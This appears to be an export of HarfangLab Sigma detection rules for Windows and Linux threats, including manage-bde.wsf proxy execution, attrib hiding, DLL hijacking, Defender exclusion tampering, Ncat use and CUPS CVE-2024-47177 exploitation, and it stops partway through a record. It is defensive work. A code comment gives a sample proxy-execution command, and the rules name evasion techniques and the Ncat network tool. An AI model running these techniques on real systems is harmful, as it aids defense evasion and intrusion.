"content": "title: Suspicious Proxy Execution via manage-bde.wsf\nid: 2216764d-df8a-4e07-bb45-54a387f5b02b\ndescription: |\n Detects the malicious execution of the legitimate manage-bde.wsf script to proxy execution of malicious binaries through the hijacking of the manage-bde.exe binary.\n The goal is to plant a manage-bde.exe binary in the current directory to execute it rather than the legitimate binary in System32.\n Attackers may abuse it to bypass security restrictions.\n This script which is used to manage BitLocker and has been deprecated since Windows 7 while manage-bde.exe should be used instead.\n It is recommended to analyze the process responsible for the execution of the manage-bde.wsf script to look for malicious content and other suspicious actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/01/27\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.ManageBDE\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # set comspec=c:\\windows\\system32\\calc.exe & cscript c:\\windows\\system32\\manage-bde.wsf\n selection:\n ParentImage|endswith: '\\cscript.exe'\n ParentCommandLine|contains: 'manage-bde.wsf'\n\n exclusion_normal_execution:\n Image: '?:\\Windows\\System32\\cmd.exe'\n CommandLine: '?:\\Windows\\system32\\cmd.exe /c manage-bde.exe -legacy_Vista*'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2216764d-df8a-4e07-bb45-54a387f5b02b",
"rule_name": "Suspicious Proxy Execution via manage-bde.wsf",
"rule_description": "Detects the malicious execution of the legitimate manage-bde.wsf script to proxy execution of malicious binaries through the hijacking of the manage-bde.exe binary.\nThe goal is to plant a manage-bde.exe binary in the current directory to execute it rather than the legitimate binary in System32.\nAttackers may abuse it to bypass security restrictions.\nThis script which is used to manage BitLocker and has been deprecated since Windows 7 while manage-bde.exe should be used instead.\nIt is recommended to analyze the process responsible for the execution of the manage-bde.wsf script to look for malicious content and other suspicious actions.\n",
"rule_creation_date": "2022-01-27",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "222c898a-8fe8-430e-9b10-8075c5f1ca5c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620258Z",
"creation_date": "2026-03-23T11:45:34.620260Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620264Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_file_hidden_through_attrib.yml",
"content": "title: File or Directory Hidden via Attrib.exe\nid: 222c898a-8fe8-430e-9b10-8075c5f1ca5c\ndescription: |\n Detects when files/directories are set as Hidden and System through using attrib.exe.\n This technique can be used by an attacker to hide sensitives directories and/or tools.\n It is recommended to examine the process tree associated with this process to understand the execution context and to determine the legitimacy of this action.\nreferences:\n - https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2020/12/04\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image: '*\\attrib.exe'\n CommandLine|contains|all:\n - '+h' # hidden\n - '+s' # system\n\n exclusion_desktop_ini:\n # attrib +s +h C:\\3DEXPERIENCE/desktop.ini\n CommandLine|endswith:\n - '/desktop.ini'\n - '\\desktop.ini'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_samsung_link:\n CommandLine|contains: '?:\\ProgramData\\Samsung\\Samsung Link\\SamsungLink.lock'\n\n exclusion_samsung_link_tray:\n CommandLine|contains: 'AppData\\Roaming\\SAMSUNG\\Samsung Link\\ASPAgent.lock'\n\n exclusion_intel_gfx_cui:\n # Intel Common User Interface GFX execute a bat that hides all cui files in 'C:\\Windows\\System32\\'\n #GrandparentImage: '?:\\Windows\\System32\\igfxCUIService.exe'\n ParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\system32\\{????????-????-????-????-????????????}.bat'\n CommandLine:\n - 'attrib *+R +H +S +A ?.cui'\n # Workaround for issue 18 (fixed in 2.8.1 and upper)\n - 'attrib +R +H +S +A ?.cui'\n - 'attrib +R +H +S +A ?.cui'\n\n exclusion_razer:\n CommandLine: 'attrib +h +s ?:\\Users\\\\*\\AppData\\Local\\Razer\\RazerAxon\\WallpaperSource\\\\*'\n GrandparentImage: '?:\\Program Files (x86)\\Razer\\Razer Axon\\RazerAxon.exe'\n\n exclusion_syngo:\n CommandLine: '?:\\Windows\\system32\\attrib.exe +s +h \\\\.\\GLOBALROOT\\device\\harddisk0\\partition3\\Recovery\\WindowsRE\\winre.wim'\n ParentCommandLine: 'powershell.exe -ExecutionPolicy Bypass -command try{.\\InstallRAIDdriver.ps1 ?:\\Store\\Log\\Installation\\FieldUpdater\\\\*\\; exit $lastexitcode}catch{echo Exception-message: $_.Exception.Message;exit 1}'\n\n # https://gist.github.com/pknowledge/1feef32fa21475eb9742ea247aefe1af\n exclusion_folder_private:\n CommandLine: 'attrib +h +s Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}'\n ParentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\\\*.bat'\n\n exclusion_hp:\n CommandLine:\n - 'attrib +r +h +s ?:\\hp'\n - 'attrib +r +h +s ?:\\system.sav'\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c ?:\\system.sav\\logs\\RunFLC.cmd'\n GrandparentImage: '?:\\Windows\\System32\\runonce.exe'\n\n exclusion_blackmagic:\n CommandLine: 'attrib +h +s */auto_Uninstall.qs'\n GrandparentImage|endswith: '\\Blackmagic_Fairlight_Sound_Library_Windows.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "222c898a-8fe8-430e-9b10-8075c5f1ca5c",
"rule_name": "File or Directory Hidden via Attrib.exe",
"rule_description": "Detects when files/directories are set as Hidden and System through using attrib.exe.\nThis technique can be used by an attacker to hide sensitives directories and/or tools.\nIt is recommended to examine the process tree associated with this process to understand the execution context and to determine the legitimacy of this action.\n",
"rule_creation_date": "2020-12-04",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "224d53d5-5b47-46d6-bae7-c97ed2c94fed",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093020Z",
"creation_date": "2026-03-23T11:45:34.093022Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093027Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_srtasks.yml",
"content": "title: DLL Hijacking via srtasks.exe\nid: 224d53d5-5b47-46d6-bae7-c97ed2c94fed\ndescription: |\n Detects potential Windows DLL Hijacking via srtasks.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'srtasks.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\ktmw32.dll'\n - '\\SPP.dll'\n - '\\SRCLIENT.dll'\n - '\\SRCORE.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "224d53d5-5b47-46d6-bae7-c97ed2c94fed",
"rule_name": "DLL Hijacking via srtasks.exe",
"rule_description": "Detects potential Windows DLL Hijacking via srtasks.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "22822193-9f29-4f1e-8001-93546cec1e4a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610942Z",
"creation_date": "2026-03-23T11:45:34.610945Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610953Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
"https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_defender_add_exclusion.yml",
"content": "title: Windows Defender Exclusion List Modified\nid: 22822193-9f29-4f1e-8001-93546cec1e4a\ndescription: |\n Detects the modification of Windows Defender's exclusion list.\n Adversaries may modify the exclusion list to avoid possible detection of their tools.\n It is recommended to ensure this new exclusion is legitimate as well as to look for other suspicious actions on the affected host.\nreferences:\n - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\n - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2020/09/25\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|startswith:\n # NOTE: Even when using PowerShell (via Add-MpPreference), msmpeng is always the one doing this operation.\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Extensions\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_hurukai:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\\\?:\\Program Files\\HarfangLab'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\\\?:\\Program Files\\HarfangLab\\\\*'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\\\?:\\Program Files\\HarfangLab'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\\\?:\\Program Files\\HarfangLab\\\\*'\n Details: 'DWORD (0x00000000)'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "22822193-9f29-4f1e-8001-93546cec1e4a",
"rule_name": "Windows Defender Exclusion List Modified",
"rule_description": "Detects the modification of Windows Defender's exclusion list.\nAdversaries may modify the exclusion list to avoid possible detection of their tools.\nIt is recommended to ensure this new exclusion is legitimate as well as to look for other suspicious actions on the affected host.\n",
"rule_creation_date": "2020-09-25",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "228c8306-0e42-40a0-89b5-bdbf8a539ddb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604822Z",
"creation_date": "2026-03-23T11:45:34.604826Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604833Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://nmap.org/ncat/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md#atomic-test-2---netcat-c2",
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/techniques/T1095/"
],
"name": "t1049_ncat.yml",
"content": "title: Ncat Execution\nid: 228c8306-0e42-40a0-89b5-bdbf8a539ddb\ndescription: |\n Detects the execution of Ncat, a feature-packed networking utility which reads and writes data across networks from command-line.\n Ncat was written for the Nmap Project as a much-improved reimplementation of Netcat.\n Attackers can use ncat to perform malicious activities such as reconnaissance, lateral movement, reverse shell, etc.\n It is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\nreferences:\n - https://nmap.org/ncat/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md#atomic-test-2---netcat-c2\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/techniques/T1095/\ndate: 2022/08/17\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.command_and_control\n - attack.t1095\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Ncat\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # by default Ncat is signed by Insecure.Com LLC\n Imphash: '424b839c413b54caf852f99fc5055a49'\n\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "228c8306-0e42-40a0-89b5-bdbf8a539ddb",
"rule_name": "Ncat Execution",
"rule_description": "Detects the execution of Ncat, a feature-packed networking utility which reads and writes data across networks from command-line.\nNcat was written for the Nmap Project as a much-improved reimplementation of Netcat.\nAttackers can use ncat to perform malicious activities such as reconnaissance, lateral movement, reverse shell, etc.\nIt is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\n",
"rule_creation_date": "2022-08-17",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1049",
"attack.t1095"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "22e5297e-5d7b-4785-82f5-62dea6132903",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602458Z",
"creation_date": "2026-03-23T11:45:34.602461Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602469Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_printbrmui.yml",
"content": "title: DLL Hijacking via printbrmui.exe\nid: 22e5297e-5d7b-4785-82f5-62dea6132903\ndescription: |\n Detects potential Windows DLL Hijacking via printbrmui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'printbrmui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "22e5297e-5d7b-4785-82f5-62dea6132903",
"rule_name": "DLL Hijacking via printbrmui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via printbrmui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2307c08f-aa49-4fa1-a3d5-d2a849e2bf17",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625154Z",
"creation_date": "2026-03-23T11:45:34.625156Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625160Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/",
"https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1",
"https://www.elastic.co/security-labs/cups-overflow",
"https://attack.mitre.org/techniques/T1203/"
],
"name": "cve_2024_47177_cupsd_foomatic_rip_shell_execution.yml",
"content": "title: CUPS CVE-2024-47177 Vulnerability Exploited\nid: 2307c08f-aa49-4fa1-a3d5-d2a849e2bf17\ndescription: |\n Detects the suspicious creation of child processes by the foomatic-rip process related to the exploitation of the CUPS (Common UNIX Printing System) vulnerability.\n This detection rule is related to multiple vulnerabilities in the CUPS printing system, including CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177.\n These flaws allow for remote unauthenticated attackers to manipulate IPP URLs or inject malicious data through crafted UDP packets or network spoofing.\n This can result in arbitrary command execution when a print job is initiated.\n It is recommended to investigate the command-line performing this action to determine its legitimacy.\nreferences:\n - https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/\n - https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1\n - https://www.elastic.co/security-labs/cups-overflow\n - https://attack.mitre.org/techniques/T1203/\ndate: 2024/10/02\nmodified: 2025/12/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - cve.2024-47177\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.CUPS\n - classification.Linux.Exploit.CVE-2024-47177\nlogsource:\n product: linux\n category: process_creation\ndetection:\n selection:\n ProcessParentImage|endswith: '/foomatic-rip'\n sha256|contains: '?' # at least one character, some SHA256 are empty\n\n filter_image:\n ProcessImage:\n - '/usr/bin/foomatic-rip'\n - '/usr/lib/cups/filter/foomatic-rip'\n - '/usr/bin/cat'\n - '/usr/bin/gs'\n\n filter_gs:\n ProcessCommandLine|contains|all:\n - ' -c '\n - ' gs '\n - ' -dBATCH'\n - ' -dNOPAUSE'\n - ' -sDEVICE'\n\n exclusion_plg:\n ProcessCommandLine|contains|all:\n - '@PJL SET COPIES'\n - ' -dPARANOIDSAFER '\n - ' -sDEVICE='\n - ' -sOutputFile='\n\n exclusion_epson:\n ProcessParentCommandLine|contains|all:\n - 'Collate finishings='\n - 'number-up='\n - 'job-uuid='\n - 'job-originating-host-name='\n - 'time-at-creation='\n - 'time-at-processing='\n CommandLine|startswith: 'perl -p -e if (! $did) {'\n\n exclusion_printer_payloads:\n ProcessCommandLine|contains:\n # These payloads are from legitimate printer software/tools, primarily used during the pre-printing process.\n - '-c printf \"%%!PS-Adobe-3.0'\n - '/bin/sh -e -c foo2zjs-wrapper '\n - 'ipp://localhost/printers/'\n - '/pdffile (/tmp/foomatic-'\n - '/bin/sh -e -c pdftops '\n - '/var/spool/cups/tmp/foomatic-*'\n - '/bin/sh -e -c foo2xqx-wrapper '\n - '/bin/bash -e -c /bin/cat - | sicgsfilter '\n\n exclusion_cat:\n ProcessCommandLine:\n - '/bin/sh -e -c cat'\n - '/bin/bash -c cat'\n - '/bin/bash -e -c cat'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2307c08f-aa49-4fa1-a3d5-d2a849e2bf17",
"rule_name": "CUPS CVE-2024-47177 Vulnerability Exploited",
"rule_description": "Detects the suspicious creation of child processes by the foomatic-rip process related to the exploitation of the CUPS (Common UNIX Printing System) vulnerability.\nThis detection rule is related to multiple vulnerabilities in the CUPS printing system, including CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177.\nThese flaws allow for remote unauthenticated attackers to manipulate IPP URLs or inject malicious data through crafted UDP packets or network spoofing.\nThis can result in arbitrary command execution when a print job is initiated.\nIt is recommended to investigate the command-line performing this action to determine its legitimacy.\n",
"rule_creation_date": "2024-10-02",
"rule_modified_date": "2025-12-17",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1203"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2312ad6d-35cc-45d7-83a7-08f4131d32b0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600939Z",
"creation_date": "2026-03-23T11:45:34.600943Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600951Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
